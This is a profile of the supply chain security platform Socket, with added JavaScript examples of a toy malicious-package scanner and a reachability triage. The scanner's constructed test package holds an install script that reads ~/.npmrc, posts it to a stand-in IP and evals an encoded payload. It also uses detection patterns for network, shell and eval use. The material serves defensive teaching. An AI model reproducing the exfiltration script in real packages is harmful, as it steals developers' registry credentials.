# Socket

> Socket blocks malicious open source packages before they reach your code by proactively analyzing dependency behavior across all major registries.

Socket is a software supply chain security platform founded in 2021 by Feross Aboukhadijeh, a prolific open source maintainer whose projects see over a billion downloads monthly. The platform proactively detects and blocks malicious packages in real time, integrating directly into developer workflows rather than relying on reactive CVE databases. Socket is SOC 2 Type II certified and has raised $125M, according to the company's own announcements.

## What It Is

Socket is a developer-first supply chain security tool that scans every open source package and update for malicious behavior across all major registries — npm, PyPI, RubyGems, and more. Instead of waiting for a CVE to be published, Socket analyzes what a dependency's code can actually do: whether it makes network calls, which files it reads or writes, whether it declares install scripts, and whether it shows signs of typosquatting or known malware patterns. The platform surfaces these signals as actionable alerts directly in pull requests, the CLI, and the IDE, so developers can catch threats before they merge.
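To make the kinds of signals listed above concrete, here is an added example of a toy static "capability" scanner for an npm package. It is not Socket's code and does not reproduce Socket's rules; the allowlist of popular names, the capability module table, and the sample package manifest and source are all constructed for the demonstration.

```javascript
// Added example (not Socket's code): a toy static "capability" scanner that
// looks for the kinds of signals described above in an npm package. The
// package below is constructed for the demo, and the rules are illustrative.

// Assumed allowlist of popular package names used for the typosquat check.
const POPULAR_NAMES = ["lodash", "express", "request", "chalk", "axios"];

// Node built-ins whose import grants a capability worth flagging.
const CAPABILITY_MODULES = {
  network: ["http", "https", "net", "dgram", "dns", "tls"],
  filesystem: ["fs", "fs/promises"],
  shell: ["child_process"],
};

// Edit distance, used to spot names one or two keystrokes from a popular one.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return row[b.length];
}

// Collects module specifiers from require("x") and `from "x"` forms.
function importedModules(source) {
  const mods = new Set();
  const re = /(?:require\(\s*|from\s+)["']([^"']+)["']/g;
  let m;
  while ((m = re.exec(source)) !== null) mods.add(m[1]);
  return mods;
}

// Returns a list of { id, detail } findings for a manifest plus its sources.
function scanPackage(pkg, sources, popular = POPULAR_NAMES) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of ["preinstall", "install", "postinstall"]) {
    if (scripts[hook]) findings.push({ id: "install-script", detail: `${hook}: ${scripts[hook]}` });
  }
  for (const name of popular) {
    const d = levenshtein(pkg.name, name);
    if (d > 0 && d <= 2) findings.push({ id: "typosquat", detail: `${pkg.name} is ${d} edit(s) from ${name}` });
  }
  for (const [file, src] of Object.entries(sources)) {
    const mods = importedModules(src);
    for (const [cap, list] of Object.entries(CAPABILITY_MODULES)) {
      const hit = list.find((name) => mods.has(name) || mods.has(`node:${name}`));
      if (hit) findings.push({ id: cap, detail: `${file} imports ${hit}` });
    }
    if (/\beval\s*\(|new\s+Function\s*\(/.test(src)) {
      findings.push({ id: "dynamic-code", detail: `${file} uses eval/Function` });
    }
    if (/["'][A-Za-z0-9+/=]{80,}["']/.test(src)) {
      findings.push({ id: "obfuscation", detail: `${file} contains a long encoded string literal` });
    }
  }
  return findings;
}

// Sorted, de-duplicated finding ids, convenient for a block/warn policy.
function findingIds(findings) {
  return [...new Set(findings.map((f) => f.id))].sort();
}

// Constructed sample: a typosquat of lodash whose postinstall hook reads
// ~/.npmrc, posts it to a remote host, and evals a base64 payload.
const SAMPLE_PKG = { name: "lodahs", version: "1.0.0", scripts: { postinstall: "node setup.js" } };
const SAMPLE_SOURCES = {
  "setup.js": `
const https = require("https");
const { execSync } = require("child_process");
const fs = require("fs");
const payload = Buffer.from("${"aGVsbG8gd29ybGQ=".repeat(6)}", "base64").toString();
const req = https.request({ host: "203.0.113.10", method: "POST" }, () => {});
req.end(fs.readFileSync(process.env.HOME + "/.npmrc"));
eval(payload);
`,
};

for (const f of scanPackage(SAMPLE_PKG, SAMPLE_SOURCES)) console.log(`${f.id}: ${f.detail}`);
```

Run with `node`. A real scanner would parse an AST rather than regex-match source text, unpack the published tarball rather than trust the repository, and weigh the signals together (an install script alone is common in benign packages; an install script that imports `https` and `child_process` and evals a decoded blob is not), but the shape of the analysis is the same: decide what the code is capable of doing, not which version it claims to be.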

## Core Product Surface

Socket ships as a suite of integrated tools that work together across the development lifecycle:

- **Socket for GitHub** — a GitHub App that comments on PRs with risk alerts for new or updated dependencies, with configurable block/warn policies
- **Socket Firewall** — a CLI-level proxy (`sfw`) that intercepts package installs and blocks malicious packages at install time, supporting self-hosted or client/server deployment
- **Socket CLI** — command-line scanning for local and CI environments
- **Socket Reachability** — precomputed reachability analysis that, according to Socket, automatically suppresses about 60% of CVE alerts whose vulnerable code the application never calls; the Enterprise tier adds full application function-level reachability, which Socket claims eliminates up to 90% of irrelevant CVE alerts
- **Socket Certified Patches** — human-reviewed, one-click patches for CVEs, including combined multi-CVE patches and automatic patch PRs
- **Socket Web Extension** — browser extension for reviewing package security on registry pages
- **Socket Dependency Search** — security scoring for millions of open source packages across registries
- **Socket ExtensionGuard** — scanning for browser and IDE extensions
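The reachability item above deserves a worked illustration of why function-level analysis removes more noise than a package-level check. The following is an added example, not Socket's analysis: it walks a constructed call graph from the application's entry point and reports, for each hypothetical advisory, whether the vulnerable package is reached at all and whether the specific vulnerable function is reached. Package names, edges, and advisory ids are all made up.

```javascript
// Added example (not Socket's analysis): function-level reachability over a
// constructed call graph. Nodes are "package:function"; "app" is the
// application itself. Packages, edges and advisory ids are made up.
const CALL_GRAPH = {
  "app:main": ["app:handleUpload", "app:renderPage"],
  "app:handleUpload": ["tar-lib:extract"],
  "app:renderPage": ["tmpl-lib:render"],
  "tar-lib:extract": ["tar-lib:parseHeader", "tar-lib:writeEntry"],
  "tar-lib:parseHeader": [],
  "tar-lib:writeEntry": ["tar-lib:normalizePath"],
  "tar-lib:normalizePath": [],
  "tar-lib:unpackSymlink": ["tar-lib:writeEntry"], // exported, but nothing in app calls it
  "tmpl-lib:render": ["tmpl-lib:escape"],
  "tmpl-lib:escape": [],
  "tmpl-lib:compileUnsafe": [],
  "legacy-lib:parse": [], // installed transitively, never imported by app
};

// Hypothetical advisories, each naming the function(s) that carry the flaw.
const ADVISORIES = [
  { id: "EXAMPLE-ADV-1", pkg: "tar-lib", vulnerableFunctions: ["tar-lib:normalizePath"] },
  { id: "EXAMPLE-ADV-2", pkg: "tar-lib", vulnerableFunctions: ["tar-lib:unpackSymlink"] },
  { id: "EXAMPLE-ADV-3", pkg: "tmpl-lib", vulnerableFunctions: ["tmpl-lib:compileUnsafe"] },
  { id: "EXAMPLE-ADV-4", pkg: "legacy-lib", vulnerableFunctions: ["legacy-lib:parse"] },
];

// Breadth-first walk from the entry points. Returns a parent map whose keys
// are every reachable node, so a shortest call path can be rebuilt later.
function bfsParents(graph, entryPoints) {
  const parent = new Map();
  const queue = [];
  for (const entry of entryPoints) {
    if (!parent.has(entry)) { parent.set(entry, null); queue.push(entry); }
  }
  while (queue.length > 0) {
    const node = queue.shift();
    for (const callee of graph[node] || []) {
      if (!parent.has(callee)) { parent.set(callee, node); queue.push(callee); }
    }
  }
  return parent;
}

// Call path from an entry point to `target`, or null if unreachable.
function callPath(parent, target) {
  if (!parent.has(target)) return null;
  const path = [];
  for (let node = target; node !== null; node = parent.get(node)) path.unshift(node);
  return path;
}

// Coarse, dependency-level check: is any function of `pkg` reachable at all?
function packageReachable(parent, pkg) {
  for (const node of parent.keys()) if (node.startsWith(`${pkg}:`)) return true;
  return false;
}

// Triage advisories: report package-level and function-level reachability and
// the first call path found, so a reviewer can confirm the exposure by hand.
function triageAdvisories(graph, entryPoints, advisories) {
  const parent = bfsParents(graph, entryPoints);
  return advisories.map((adv) => {
    const paths = adv.vulnerableFunctions
      .map((fn) => callPath(parent, fn))
      .filter((p) => p !== null);
    return {
      id: adv.id,
      pkg: adv.pkg,
      packageReachable: packageReachable(parent, adv.pkg),
      functionReachable: paths.length > 0,
      path: paths.length > 0 ? paths[0] : null,
    };
  });
}

for (const r of triageAdvisories(CALL_GRAPH, ["app:main"], ADVISORIES)) {
  console.log(`${r.id} (${r.pkg}): package=${r.packageReachable} function=${r.functionReachable}` +
    (r.path ? ` via ${r.path.join(" -> ")}` : ""));
}
```

On this graph a package-level check keeps three of the four advisories on the list (only `legacy-lib` is never touched), while the function-level check keeps one: `tar-lib:normalizePath` is reached through the upload handler, but `tar-lib:unpackSymlink` and `tmpl-lib:compileUnsafe` are never called. The `packageReachable` flag stands in for a coarser precomputed check and `functionReachable` for full application analysis. A static call graph misses edges introduced by dynamic dispatch, `eval`, and reflection, so "unreachable" is grounds for lowering priority, not for waiving the finding outright.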

## Integrations and Platform Coverage

Socket integrates across the modern development stack. Source control integrations include GitHub on all paid tiers, with GitLab, Bitbucket, Azure DevOps, and self-hosted SCM available on Enterprise. Package manager support spans 10+ languages including JavaScript/TypeScript, Python, Go, and Ruby. Messaging and ticketing integrations include Slack alerts for new malware or vulnerabilities and Jira. SIEM integrations are available on paid tiers. The platform also supports SBOM import/export, SSO/SAML, SCIM provisioning, webhook automation, compliance integrations (e.g., Vanta), an MCP server, and AI code agent integrations.

## Adoption and Recognition

According to Socket's own published metrics, the platform protects over 1.5 million code repositories, secures more than 11.6 million commits per month, and blocks over 10,000 attacks per week across more than 27,000 organizations. Socket publishes case studies naming Anthropic, Vercel, MetaMask, Drata, and Replit as customers. The company states it has been recognized on the Fortune Cyber 60 list and is part of OpenAI's Trusted Access for Cyber program alongside Semgrep, Calif, and Trail of Bits.

## Update: Launch Week — Repository Access Permissions and Custom Roles

Socket's most recent announced feature, highlighted at the top of the site during a "Launch Week," is the introduction of Repository Access Permissions and Custom Roles. This expands the platform's access control capabilities, allowing organizations to define granular permissions at the repository level and assign custom roles to team members — a feature particularly relevant for larger enterprise deployments managing many repositories and contributors.

## Why It Stands Out

Traditional SCA tools are reactive: they alert on known CVEs after the fact. Socket's approach is behavioral — it detects zero-day supply chain attacks by analyzing what a package actually does, not just what version it is. The company was founded by open source maintainers who built the JavaScript ecosystem tooling that Socket now helps secure, giving the team direct insight into how supply chain attacks are constructed and how developers actually work.

## Features
- Malicious package detection across all major registries
- Socket for GitHub PR integration with block/warn policies
- Socket Firewall — blocks malicious packages at install time
- Socket Reachability — cuts CVE false positives by filtering unreachable code
- Full application function-level reachability (Enterprise)
- Socket Certified Patches — human-reviewed one-click CVE patches
- Automatic patch PRs
- Socket CLI for local and CI scanning
- Socket Web Extension for registry browsing
- Socket Dependency Search with security scoring
- Socket ExtensionGuard — scans browser and IDE extensions
- SBOM import/export
- SSO/SAML and SCIM provisioning
- Webhook automation
- Compliance integrations (e.g., Vanta)
- SIEM integrations
- Slack alerts for new malware or vulnerabilities
- AI analysis flagging hidden dependency behavior
- Scan GitHub Actions and AI models
- MCP server integration
- AI code agent integrations
- Monorepo support
- Custom security and license policies per repository label
- Audit logs and historical analytics
- SOC 2 Type II compliance

## Integrations
GitHub, GitLab, Bitbucket, Azure DevOps, npm, PyPI, RubyGems, Go modules, Slack, Jira, Vanta, SIEM platforms, Stripe (payments), MCP server, AI code agents, IDE plugins (VS Code, JetBrains), GCP Marketplace

## Platforms
WEB, CLI, API, BROWSER_EXTENSION, VSC_EXTENSION, JETBRAINS_PLUGIN

## Pricing
Freemium — Free tier available with paid upgrades

## Links
- Website: https://socket.dev
- Documentation: https://docs.socket.dev/
- Repository: https://github.com/SocketDev
- EveryDev.ai: https://www.everydev.ai/tools/socket-dev
